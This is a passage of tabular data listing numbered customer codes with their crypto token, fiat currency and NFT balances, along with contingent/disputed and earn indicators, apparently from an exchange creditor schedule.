| 07344333 | | BF_POINT[200], USD[0.18] | Yes | |
| 07344334 | | BAT[2], BRZ[2], BTC[.0015625], CUSDT[2], DOGE[4], GRT[1], SUSHI[0], TRX[2], USD[0.00] | | |
| 07344335 | | BRZ[2], CUSDT[59.90117871], DOGE[2], GRT[22.91010319], UNI[.00002164], USD[0.00] | Yes | |
| 07344336 | | USD[0.00], USDT[0.60703896] | | |
| 07344337 | | USD[10.00] | | |
| 07344339 | | USD[10.00] | | |
| 07344340 | | USD[10.00] | | |
| 07344341 | | BRZ[2], CUSDT[5], DOGE[7.36857961], GRT[1.00503324], TRX[3], USD[0.00] | Yes | |
| 07344342 | | USD[10.00] | | |
| 07344343 | | USD[10.00] | | |
| 07344344 | | USD[10.00] | | |
| 07344345 | | BTC[.02410882], CUSDT[7], DOGE[25029.39596253], ETH[1.01467507], ETHW[1.01424895], SHIB[3772567.71477668], SUSHI[63.15254412], TRX[2], USD[0.00] | Yes | |
| 07344346 | | BRZ[53.12738326], DOGE[1171.51648756], SUSHI[.97549644], USD[11.56] | | |
| 07344348 | | USD[10.41] | Yes | |
| 07344349 | | USD[10.00] | | |
| 07344350 | | BRZ[0], DOGE[.00744718], LTC[0], TRX[0], USD[0.01] | Yes | |
| 07344351 | | CUSDT[11], SHIB[261.53576386], TRX[3], USD[0.00] | Yes | |
| 07344352 | | DOGE[6191.49143851], TRX[168.51402386], USD[0.00] | | |
| 07344353 | | BRZ[1], CUSDT[9], GRT[.33398957], TRX[5], USD[0.09], USDT[0] | | |
| 07344354 | | CUSDT[1], ETH[0], ETHW[0], TRX[294.95605594], USD[0.00] | | |
| 07344356 | | USD[0.10] | | |
| 07344357 | | CUSDT[3], DOGE[.00000621], TRX[2], USD[41.82] | | |
| 07344358 | | BRZ[2], CUSDT[5], DOGE[393.19782071], USD[0.01] | Yes | |
| 07344359 | | BRZ[1], CUSDT[2], DOGE[839.10838684], TRX[7], USD[0.00] | | |
| 07344360 | | USD[10.00] | | |
| 07344361 | | BRZ[0], BTC[0], DOGE[0.06802549], ETH[0], ETHW[0], GRT[0], SUSHI[0], USD[0.01] | | |
| 07344362 | | BRZ[2], CUSDT[6], USD[0.01], USDT[0] | | |
| 07344363 | | USD[10.00] | | |
| 07344364 | | CUSDT[2], DOGE[5], USD[0.00] | | |
| 07344365 | | DOGE[.68090322], USD[0.00] | | |
| 07344366 | | DOGE[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344367 | | AAVE[.00000036], BAT[.00020313], BCH[.00000056], BF_POINT[300], DOGE[41.74232695], GRT[.00042708], LINK[.00001806], LTC[.00003805], MATIC[.00023226], MKR[.0000001], SHIB[.5], UNI[.00000561], USD[0.00], USDT[0.000000001] | Yes | |
| 07344368 | | USD[10.00] | | |
| 07344369 | | SOL[0], USD[0.00] | | |
| 07344370 | | USD[10.00] | | |
| 07344371 | | USD[10.00] | | |
| 07344372 | | SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07344373 | | BTC[0], DOGE[0], ETH[0], ETHW[0], TRX[2], USD[0.19] | | |
| 07344374 | | ETH[.00713724], ETHW[.00713724], USD[10.00] | | |
| 07344375 | | BAT[334.40618538], BRZ[2], BTC[.02437348], CUSDT[9], DOGE[12434.49778827], ETH[.34888569], ETHW[0.34873900], GRT[1127.807203], LINK[33.19013453], MATIC[178.92858118], NFT (343608890920130784/Eye of God)[1], NFT (358179361121847584/Angel )[1], NFT (391865819637465524/Dream Girl #007)[1], NFT (486775510387743391/Egg #0002 - Salt Water )[1], SHIB[23395535.91813586], SOL[4.96198796], SUSHI[29.1726061], TRX[5077.59195457], UNI[13.02717499], USD[0.38], USDT[19.80606258], YFI[.01917827] | Yes | |
| 07344376 | | USD[10.00] | | |
| 07344377 | | BRZ[9], CUSDT[20], DOGE[125207.38569406], SGD[37.37997883], TRX[28637.78514924], UNI[.00005198], USD[2.06], USDT[2] | | |
| 07344378 | | BTC[.0001725], DOGE[2921.69438535], USD[0.00] | | |
| 07344379 | | USD[20.00] | | |
| 07344380 | | USD[10.00] | | |
| 07344381 | | BAT[.02884308], BRZ[4], ETH[0], GRT[.56587365], TRX[1], USD[10.00] | | |
| 07344382 | | BRZ[1], BTC[0], DOGE[0], ETH[0.00000001], SHIB[0], USD[0.00], USDT[0] | Yes | |
| 07344383 | | CUSDT[3], GRT[1], USD[0.01] | | |
| 07344384 | | USD[10.00] | | |
| 07344385 | | DOGE[.00001042], USD[0.26] | | |
| 07344386 | | USD[10.00] | | |
| 07344387 | | BTC[.00000047], CUSDT[2], DOGE[.00017093], TRX[2], USD[0.40], USDT[0] | | |
| 07344388 | | BAT[1], BRZ[2], CUSDT[4], DOGE[2173.84589835], GRT[1], NFT (321216359688325509/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #14)[1], NFT (350740127233211212/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #13)[1], TRX[3], USD[0.00] | | |
| 07344389 | | CUSDT[8], DOGE[3], SHIB[1], USD[30279.64], USDT[0] | Yes | |
| 07344390 | | USD[11.06] | Yes | |
| 07344391 | | USD[10.00] | | |
| 07344392 | | USD[10.00] | | |
| 07344393 | | BAT[1], BRZ[2], CUSDT[5], TRX[4], USD[0.00], USDT[0] | | |
| 07344394 | | CUSDT[1], DOGE[5.99038371], ETH[.01124122], ETHW[.01110442], USD[0.00] | Yes | |
| 07344395 | | USD[0.00] | | |
| 07344396 | | USD[10.00] | | |
| 07344397 | | USD[10.00] | | |
| 07344398 | | BRZ[.00246042], BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07344399 | | BTC[.00018642], USD[0.00] | | |
| 07344400 | | USD[10.00] | | |
| 07344403 | | BAT[1], BRZ[2], DOGE[19371.37670237], GRT[2], SOL[1], SUSHI[1], USD[0.00], USDT[2] | | |
| 07344404 | | BAT[1], DOGE[1.01268015], USD[0.00], USDT[0] | | |
| 07344406 | | USD[10.00] | | |
| 07344407 | | USD[10.00] | | |
| 07344409 | | USD[10.00] | | |
| 07344411 | | USD[10.00] | | |
| 07344412 | | BRZ[1], CUSDT[12], DOGE[41.61096935], USD[0.00] | Yes | |
| 07344413 | | BTC[0.00000280], ETH[0], NFT (307810333024668830/Confetti #129)[1], NFT (370810974137763227/CO2 FX #118)[1], NFT (388415735482885276/Cloud Storm #451)[1], NFT (402159208454743012/Red Moon #140)[1], NFT (469319376135414074/Rainbow #231)[1], SOL[14.13], USD[2.48] | | |
| 07344414 | | GRT[.308], LINK[.008], MATIC[.00000001], SOL[.004], SUSHI[.0895], TRX[.850224], USD[0.00] | | |
| 07344415 | | USD[10.00] | | |
| 07344416 | | CUSDT[1], DOGE[49.38326761], USD[0.00] | | |
| 07344417 | Contingent, Disputed | USD[0.00] | | |
| 07344418 | | USD[10.00] | | |
| 07344419 | | BAT[31.64893782], CUSDT[1], DOGE[691.08088092], GRT[22.26717542], MATIC[13.78215822], SOL[1.1062751], TRX[300.29506993], USD[0.00] | | |
| 07344420 | | CUSDT[1], DOGE[1], USD[0.45] | | |
| 07344421 | | USD[10.00] | | |
| 07344422 | | USD[10.00] | | |
| 07344423 | | CUSDT[2], USD[0.00] | | |
| 07344424 | | CUSDT[4], DOGE[22.65060671], TRX[2], USD[0.01] | | |
| 07344425 | | BTC[0.01550564], DOGE[840.59109336], USD[11.92] | Yes | |
| 07344426 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07344427 | | BTC[.00031435], DOGE[1.7034193], ETH[.00060734], ETHW[.00060734], TRX[1], USD[0.41] | | |
| 07344428 | | USD[5.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344429 | | BTC[.00000178], USD[0.00], USDT[0] | | |
| 07344430 | | USD[10.00] | | |
| 07344432 | | DOGE[1], SOL[.21460556], SUSHI[5.00686058], USD[0.00] | | |
| 07344433 | | BCH[0], BRZ[0], BTC[0], DOGE[0.00230231], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | | |
| 07344434 | | DOGE[5011.48862285], USD[10.00] | | |
| 07344435 | | USD[10.00] | | |
| 07344436 | | USD[10.00] | | |
| 07344437 | | USD[10.00] | | |
| 07344438 | | BTC[.09927411], CAD[0.00], CUSDT[2], DOGE[26879.69419719], EUR[0.00], GBP[0.00], MATIC[18.14190619], NFT (32494031971367 8695/Esteban Heath #2)[1], NFT (42583416447 5463904/Reem Kufi #5)[1], USD[0.01] | Yes | |
| 07344439 | | USD[10.00] | | |
| 07344440 | | BAT[4.34271477], BRZ[2], CUSDT[5], DOGE[45816.48986577], ETH[3.10578083], ETHW[3.10449499], GRT[2.05656799], LINK[177.88006103], LTC[6.30425436], SHIB[142425198.01360674], SOL[12.36616364], SUSHI[32.67430853], TRX[11.00144753], USD[0.00], USDT[6.47309244] | Yes | |
| 07344441 | | BTC[.00228334], LTC[.03315383], USD[0.00] | Yes | |
| 07344442 | | ETH[.00495077], ETHW[.00495077], USD[0.00] | | |
| 07344443 | | USD[10.00] | | |
| 07344444 | | BRZ[1], CUSDT[3], DOGE[3947.16615824], USD[0.00] | | |
| 07344445 | | BRZ[1], CUSDT[3], DOGE[.00004932], TRX[1], USD[0.01] | | |
| 07344446 | | USD[10.00] | | |
| 07344447 | | USD[10.00] | | |
| 07344448 | | USD[10.00] | | |
| 07344449 | | BTC[.00057714], CUSDT[2], DOGE[1590.95614793], USD[0.13] | | |
| 07344451 | | BCH[0], DOGE[0.77719610], ETH[0], ETHW[0], GRT[0], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07344452 | | BAT[2], BRZ[1], BTC[0], CUSDT[3], DOGE[0], TRX[3], USD[0.00], USDT[2] | | |
| 07344453 | | DOGE[.00048261], USD[3.77] | | |
| 07344455 | | USD[0.27] | | |
| 07344456 | | BTC[.00014408], USD[15.00] | | |
| 07344457 | | CUSDT[3], DOGE[571.98362384], LINK[7.60344991], TRX[1], USD[0.85], USDT[1] | | |
| 07344458 | | USD[10.00] | | |
| 07344459 | | CUSDT[9], DOGE[3942.20615878], GRT[1], USD[0.00] | | |
| 07344460 | | USD[10.00] | | |
| 07344461 | | BRZ[1], CUSDT[2], DOGE[11224.85824127], ETH[.14394911], ETHW[.14394911], GRT[36.4636103], TRX[1], USD[0.00] | | |
| 07344462 | | BAT[2], CUSDT[2], SHIB[1], TRX[4], USD[0.01], USDT[1] | | |
| 07344463 | | USD[10.00] | | |
| 07344464 | | USD[10.00] | | |
| 07344465 | | USD[10.00] | | |
| 07344466 | | USD[10.00] | | |
| 07344467 | | CUSDT[6], DOGE[0], TRX[781.77140198], USD[0.00] | Yes | |
| 07344468 | | DOGE[940.48114621], USD[0.00] | | |
| 07344469 | | USD[10.00] | | |
| 07344470 | | CUSDT[3], TRX[3], USD[0.00] | | |
| 07344471 | | BRZ[0], DOGE[0], ETH[0], USD[0.58], USDT[0] | | |
| 07344472 | | USD[10.00] | | |
| 07344473 | | DOGE[44.5654545], USD[0.00] | | |
| 07344474 | | USD[10.00] | | |
| 07344475 | | DOGE[423.46059639], USD[25.00] | | |
| 07344477 | | USD[0.00] | | |
| 07344478 | | DOGE[1226.58336165], SHIB[388233 0.78840661], TRX[1539.70345243], USD[0.00] | Yes | |
| 07344479 | | BAT[1.01655549], BRZ[2], BTC[0], CUSDT[27], DAI[0], DOGE[2], ETH[0.00000001], ETHW[0.00000001], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[10.10797560], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07344480 | | USD[10.00] | | |
| 07344481 | | USD[10.00] | | |
| 07344482 | | CUSDT[1], USD[0.00] | | |
| 07344483 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07344484 | | BTC[.00000001], DOGE[.00002135], USD[0.10], USDT[0] | | |
| 07344485 | | TRX[1], USD[15.17] | | |
| 07344486 | | DOGE[212.48470906], USD[0.00] | | |
| 07344487 | | BCH[0], CUSDT[1], DOGE[.00037107], TRX[1], USD[0.00] | | |
| 07344488 | | CUSDT[2], MATIC[12.51880399], TRX[1], USD[0.00] | Yes | |
| 07344489 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344490 | | CUSDT[3], DOGE[.15196402], SOL[.00574798], SUSHI[.0704641], TRX[1], USD[0.01] | | |
| 07344491 | | USD[10.00] | | |
| 07344492 | | USD[0.00] | Yes | |
| 07344493 | | BRZ[8.19278534], CUSDT[31], DOGE[5.02926571], ETHW[.06317672], LINK[0.00025973], MATIC[.00283691], SHIB[26], TRX[16.12376335], USD[26.16] | Yes | |
| 07344494 | | USD[10.00] | | |
| 07344495 | | USD[10.00] | | |
| 07344496 | | USD[10.00] | | |
| 07344499 | | USD[0.00] | | |
| 07344500 | | DOGE[2], SHIB[61040356.53460019], USD[0.04], USDT[0] | Yes | |
| 07344501 | | DOGE[0], GRT[0], LINK[0], TRX[0], USD[0.00], USDT[0] | | |
| 07344502 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07344503 | | CUSDT[1], TRX[1], USD[50.38], USDT[0] | | |
| 07344504 | | USD[0.01] | | |
| 07344505 | | CUSDT[3], DOGE[550.22091848], MATIC[4.06582488], TRX[2], USD[0.00] | | |
| 07344506 | | TRX[72.52534633], USD[0.00] | | |
| 07344507 | | USD[10.00] | | |
| 07344508 | | DOGE[605.29048075], USD[0.00] | | |
| 07344509 | | USD[0.00] | | |
| 07344510 | | CUSDT[3], DOGE[312.71420738], GBP[31.45], TRX[2], USD[0.01] | Yes | |
| 07344511 | | USD[10.24] | Yes | |
| 07344512 | | SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07344513 | | BTC[.00009307], USD[0.00] | Yes | |
| 07344514 | | USD[0.00] | | |
| 07344515 | | USD[10.00] | | |
| 07344516 | | USD[10.00] | | |
| 07344517 | | BTC[0], DOGE[0], SHIB[1], USD[0.01], USDT[0] | | |
| 07344518 | | USD[10.00] | | |
| 07344520 | | AAVE[1.15678817], ALGO[98.26020966], AVAX[2.87114258], BAT[270.16151377], BCH[0.34939608], BRZ[0], BTC[0.01618060], DOGE[2668.90956333], ETH[0.23539433], ETHW[1.54115690], GRT[413.60293587], LINK[21.12338648], LTC[1.54421910], MATIC[345.02947864], MKR[0.06222505], NFT (352302335285463782/Saudi Arabia Ticket Stub #14)[1], NFT (451248200495673573/Barcelona Ticket Stub #2084)[1], SHIB[26915063.94850356], SOL[7.59236746], SUSHI[321.72809698], TRX[1610.24637650], UNI[9.30015696], USD[1735.86], USDT[0], YFI[0.01029247] | Yes | |
| 07344522 | | TRX[1], USD[70.17] | | |
| 07344523 | | USD[10.00] | | |
| 07344524 | | USD[0.00] | | |
| 07344525 | | DOGE[2], TRX[.000003], USD[0.00] | | |
| 07344526 | | USD[0.00] | | |
| 07344528 | | BRZ[2], CUSDT[1], DOGE[2], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07344529 | | USD[10.00] | | |
| 07344530 | | USD[10.00] | | |
| 07344531 | | USD[20.00] | | |
| 07344532 | | USD[10.00] | | |
| 07344533 | | NFT (440684573103718956/Imola Ticket Stub #353)[1], USD[0.00] | Yes | |
| 07344534 | | USD[10.00] | | |
| 07344535 | | DOGE[3], ETH[0.00000023], ETHW[0.00000023], GRT[0], SHIB[10], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07344536 | | CUSDT[1], DOGE[1.1287267], USD[0.00] | Yes | |
| 07344537 | | BCH[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], LINK[0], LTC[0], NFT (391051580368854476/FTX - Off The Grid Miami #1161)[1], NFT (482364918146730614/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #31)[1], PAXG[0], SUSHI[0], UNI[0], USD[0.26], USDT[0] | Yes | |
| 07344538 | | CUSDT[3], TRX[3], USD[0.43] | | |
| 07344539 | | USD[0.00] | | |
| 07344540 | | USD[10.00] | | |
| 07344541 | | DOGE[0], USD[10.00] | | |
| 07344543 | | USD[10.00] | | |
| 07344544 | | BTC[.00065137], TRX[1], USD[0.00] | | |
| 07344545 | | USD[0.00] | | |
| 07344546 | | USD[10.00] | | |
| 07344547 | | BRZ[0.00205245], BTC[0], GRT[1], USD[0.00] | | |
| 07344548 | | CUSDT[1], DOGE[1], PAXG[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07344549 | | USD[10.00] | | |
| 07344550 | | BTC[0], DOGE[1], SHIB[3], USD[0.00] | Yes | |
| 07344551 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344552 | | USD[10.00] | | |
| 07344553 | | BCH[0], BTC[0], ETH[0], GRT[0.00014075], TRX[0], USD[0.00] | | |
| 07344554 | | USD[10.00] | | |
| 07344555 | | USD[10.00] | | |
| 07344556 | | USD[10.00] | | |
| 07344557 | | BTC[.00020317], USD[0.00] | | |
| 07344558 | | BRZ[2], BTC[0], CUSDT[3], DOGE[4], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07344559 | | USD[10.00] | | |
| 07344561 | | TRX[1], USD[0.00] | | |
| 07344562 | | USD[10.00] | | |
| 07344564 | | BRZ[0], BTC[0], USD[0.00], USDT[0] | | |
| 07344565 | | USD[10.00] | | |
| 07344566 | | ALGO[0], BTC[0], DOGE[0.00111636], SOL[0.00200000], SUSHI[0], USD[0.00] | Yes | |
| 07344567 | | USD[10.00] | | |
| 07344569 | | USD[10.00] | | |
| 07344570 | | USD[10.00] | | |
| 07344572 | | ETH[0], SOL[0.33], USDT[0] | | |
| 07344573 | | USD[0.01], USDT[0] | Yes | |
| 07344574 | | USD[10.00] | | |
| 07344575 | | BRZ[1], SHIB[1], USD[0.00], USDT[0] | | |
| 07344576 | | USD[10.00] | | |
| 07344577 | | BAT[1], DOGE[149.83731343], TRX[1], USD[0.00] | | |
| 07344578 | | CUSDT[1], USD[0.01] | | |
| 07344579 | | DOGE[9.72689045], USD[0.00] | | |
| 07344580 | | DOGE[171.91204704], USD[0.00] | | |
| 07344581 | | BTC[.00085611], CUSDT[1], DOGE[.00002537], TRX[1], USD[0.67] | | |
| 07344582 | | BTC[.00049333], DOGE[1], USD[0.01] | | |
| 07344583 | | USD[0.00] | | |
| 07344584 | | USD[10.00] | | |
| 07344585 | | AUD[0.00], BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[5], DOGE[820.13849946], ETH[0], GBP[0.00], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07344586 | | BRZ[2], CUSDT[6], TRX[2], USD[0.00] | Yes | |
| 07344587 | | USD[10.00] | | |
| 07344589 | | USD[10.00] | | |
| 07344590 | | BAT[1], BF_POINT[300], BRZ[4], BTC[.01512081], CUSDT[27], DOGE[9.00517975], ETH[0.21078712], ETHW[0.00000395], LTC[.00002362], SHIB[5300135.98281541], SOL[0.00039858], TRX[23.39628508], USD[-300.00], USDT[599.32283031] | Yes | |
| 07344591 | | AVAX[.03751738], LTC[.00728], NFT (360922725526543106/Microphone #358)[1], SOL[.0085797], TRX[1501.497], USD[0.01] | | |
| 07344592 | | BTC[0], CUSDT[17], DOGE[0], ETH[0], USD[0.00] | | |
| 07344593 | | USD[10.00] | | |
| 07344594 | | USD[10.00] | | |
| 07344595 | | CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07344596 | | USD[10.00] | | |
| 07344597 | | SHIB[142.73034087], TRX[1], USD[0.00] | | |
| 07344598 | | USD[10.00] | | |
| 07344599 | | BCH[.07682248], BRZ[3], CUSDT[5], DOGE[13684.44221917], LTC[.29693597], TRX[1], USD[446.18] | Yes | |
| 07344600 | | USD[10.00] | | |
| 07344601 | | USD[10.00] | | |
| 07344602 | | ETH[.00123605], ETHW[.00123605], USD[7.00], USDT[.99470558] | | |
| 07344603 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07344604 | | DOGE[32.54891917], USD[0.00] | Yes | |
| 07344605 | | USD[0.00] | | |
| 07344606 | | USD[0.00] | Yes | |
| 07344607 | | USD[10.00] | | |
| 07344608 | | USD[10.00] | | |
| 07344609 | | CUSDT[1], DOGE[2.87035482], TRX[2], USD[0.00] | | |
| 07344610 | | BAT[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07344611 | | USD[10.00] | | |
| 07344612 | | CUSDT[2], DOGE[337.93002959], ETH[0], ETHW[0], USD[0.00] | | |
| 07344614 | | USD[10.00] | | |
| 07344615 | | BAT[2.11772684], BRZ[1], BTC[.0567416], DOGE[16745.7866107], TRX[2598.38098856], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344616 | | USD[10.00] | | |
| 07344617 | | DOGE[2], USD[0.04] | | |
| 07344618 | | BTC[.00020984], USD[0.00] | | |
| 07344619 | | USD[10.00] | | |
| 07344620 | | BTC[.0002269], DOGE[1], USD[0.00] | | |
| 07344621 | | CUSDT[1], DOGE[0], GRT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07344622 | | USD[10.00] | | |
| 07344623 | | BF_POINT[300], NFT (313964939064772883/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders – September 4, 1988 #26)[1], NFT (332507289581209349/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #48)[1], NFT (351682980460886917/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #41)[1], NFT (420302940665008854/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders – December 9, 2001 #22)[1], NFT (442416960928279096/Earl Campbell's Playbook: Rice vs. Texas – October 1st, 1977 #38)[1], NFT (488288253494916903/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #41)[1], USD[6.23], USDT[0] | Yes | |
| 07344624 | | USD[10.00] | | |
| 07344625 | | TRX[2], USD[0.01] | | |
| 07344626 | | CUSDT[2], USD[0.00] | | |
| 07344627 | | USD[10.00] | | |
| 07344628 | | CUSDT[2], DOGE[.00003219], TRX[1], USD[0.01] | | |
| 07344629 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], USD[0.00] | | |
| 07344630 | | USD[10.00] | | |
| 07344631 | | USD[0.00] | | |
| 07344632 | | USD[0.00] | | |
| 07344633 | Contingent, Disputed | USD[0.00] | | |
| 07344634 | | USD[10.00] | | |
| 07344635 | | DOGE[2], TRX[2], USD[0.00] | | |
| 07344636 | | DOGE[22.84177967], USD[0.00] | | |
| 07344637 | | USD[10.00] | | |
| 07344638 | | USD[0.01] | | |
| 07344639 | | USD[0.01], USDT[0] | | |
| 07344640 | | BRZ[1], CUSDT[6], DOGE[.60446128], TRX[1.48188037], USD[0.01] | | |
| 07344641 | | USD[10.00] | | |
| 07344642 | | BRZ[0], DOGE[684.06196306], ETH[0], GRT[0], TRX[1], USD[0.00] | Yes | |
| 07344643 | | BRZ[2], BTC[.004813], CUSDT[14], TRX[2], USD[7.14] | | |
| 07344644 | | BAT[2], BRZ[1], BTC[.00000056], CUSDT[9], DOGE[1.07693323], GRT[1.00164518], SHIB[6], TRX[5], USD[0.01], USDT[0.00000960] | Yes | |
| 07344645 | | BAT[0], BF_POINT[300], BRZ[9.9698843], CUSDT[73.18712047], DOGE[11.61465265], ETH[.00000058], ETHW[.00000058], GRT[0], NFT (322487814566199564/3D CATPUNK #6689)[1], NFT (338622674455363072/Lorenz #822)[1], NFT (346306030636066462/Elysian - #1270)[1], NFT (361988884423379278/David #642)[1], NFT (363257991646197496/Momentum #670)[1], NFT (385285173407808082/Founding Frens Lawyer #107)[1], NFT (393736216653023133/ApexDucks #5970)[1], NFT (403980252603480345/Inaugural Collection #800)[1], NFT (423445960608641325/Lorenz #844)[1], NFT (460408886019309445/DRIP NFT)[1], NFT (467705904451811384/ApexDucks Halloween #2663)[1], NFT (474550578646593813/Inaugural Collection #487)[1], NFT (514103595113198290/Momentum #353)[1], NFT (522848006270251982/Inaugural Collection #958)[1], NFT (538682013817268183/Sigma Shark #7305)[1], NFT (553659665826852440/Inaugural Collection #784)[1], NFT (557048200937025593/Inaugural Collection #655)[1], NFT (568456728067832964/Inaugural Collection #1272)[1], SHIB[3], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07344646 | | CUSDT[8], DOGE[4522.07646641], MATIC[640.43004296], SHIB[74360868.87889908], SOL[2], TRX[7], USD[305.00], USDT[0.00000001] | | |
| 07344648 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07344649 | | USD[10.00] | | |
| 07344650 | | USD[10.00] | | |
| 07344651 | | USD[10.00] | | |
| 07344654 | | USD[10.00] | | |
| 07344656 | | USD[0.00], USDT[0] | | |
| 07344657 | | GRT[.00078071], TRX[.34033035], USD[0.14] | | |
| 07344658 | | BAT[31.34365484], CUSDT[5], GRT[14.03495239], USD[1.90] | | |
| 07344659 | | USD[10.00] | | |
| 07344660 | | CUSDT[1], DOGE[.5083692], USD[0.00] | | |
| 07344661 | | DOGE[23.06831948], USD[0.43] | | |
| 07344662 | | USD[10.00] | | |
| 07344663 | | BRZ[3], CUSDT[12], DOGE[.00002393], USD[0.01], USDT[0] | | |
| 07344664 | | USD[10.00] | | |
| 07344666 | | CUSDT[1], USD[7.35], USDT[0] | | |
| 07344667 | | USD[0.00] | | |
| 07344668 | | BRZ[2], CUSDT[3], DOGE[.54213824], TRX[264.47208451], USD[0.01] | | |
| 07344669 | | USD[10.00] | | |
| 07344670 | | BTC[.000001], ETH[.00008076], ETHW[.00008076], USD[0.01] | Yes | |
| 07344671 | | CUSDT[3], USD[38.68] | | |
| 07344673 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07344674 | | BTC[0], CUSDT[1], DOGE[527.92765315], USD[0.01], USDT[1.09357442] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07344675 | | USD[10.00] | | |
| 07344676 | | BRZ[2], CUSDT[3], DOGE[2850.86990572], USD[10.00] | | |
| 07344678 | | USD[10.00] | | |
| 07344679 | | USD[0.00] | | |
| 07344680 | | CUSDT[8], DOGE[250.57591038], TRX[268.81391004], USD[0.00] | | |
| 07344681 | | USD[10.00] | | |
| 07344682 | | USD[10.00] | | |
| 07344683 | | CUSDT[1], DOGE[2], USD[117.31] | | |
| 07344684 | | DOGE[139.43489268], USD[0.00] | | |
| 07344685 | | DOGE[2.55516538], USD[9.00] | | |
| 07344686 | | USD[10.00] | | |
| 07344687 | | CUSDT[3], USD[0.01] | | |
| 07344688 | | USD[10.00] | | |
| 07344689 | | CUSDT[8], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07344690 | | BCH[0], BRZ[1], BTC[0], CUSDT[9], DOGE[580.10703905], TRX[0], USD[0.00], USDT[0.00000275] | | |
| 07344692 | | USD[10.00] | | |
| 07344693 | | BTC[0], DOGE[29350976], ETH[0], ETHW[0], SUSHI[.499], TRX[.985827], USD[0.00], USDT[.0067] | | |
| 07344694 | | BTC[.00221609], TRX[1], USD[10.00] | | |
| 07344695 | | USD[10.00] | | |
| 07344696 | | BRZ[3], CUSDT[2], DOGE[0], USD[0.35], USDT[0] | | |
| 07344697 | | USD[10.00] | | |
| 07344698 | | DOGE[1], TRX[1], USD[0.00], USDT[1] | | |
| 07344699 | | USD[0.01], USDT[0] | | |
| 07344700 | | TRX[125.49863626], USD[0.00] | Yes | |
| 07344701 | | CUSDT[1], DOGE[26.19732789], USD[0.00] | | |
| 07344702 | | CUSDT[1], SHIB[1], USD[0.09] | Yes | |
| 07344703 | | USD[0.00], USDT[0] | | |
| 07344704 | | CUSDT[3], DOGE[1], USD[0.00] | | |
| 07344705 | | DOGE[.00008395], TRX[2], USD[10.00] | | |
| 07344706 | | BRZ[2], DOGE[2787.65280512], USD[0.01] | | |
| 07344707 | | USD[10.00] | | |
| 07344708 | | USD[10.00] | | |
| 07344711 | | DOGE[80.79805599], SOL[0.23469868], USD[0.00] | | |
| 07344713 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07344714 | Contingent, Disputed | TRX[2], USD[0.00] | | |
| 07344715 | | USD[10.00] | | |
| 07344717 | | USD[10.00] | | |
| 07344718 | | CUSDT[2], DOGE[122.86782588], SOL[0.00004445], TRX[2], USD[0.00] | | |
| 07344719 | | USD[10.00] | | |
| 07344720 | | USD[10.00] | | |
| 07344721 | | USD[10.00] | | |
| 07344722 | | DOGE[139.6537843], USD[0.00] | | |
| 07344723 | | GRT[4.44660386], USD[0.00] | Yes | |
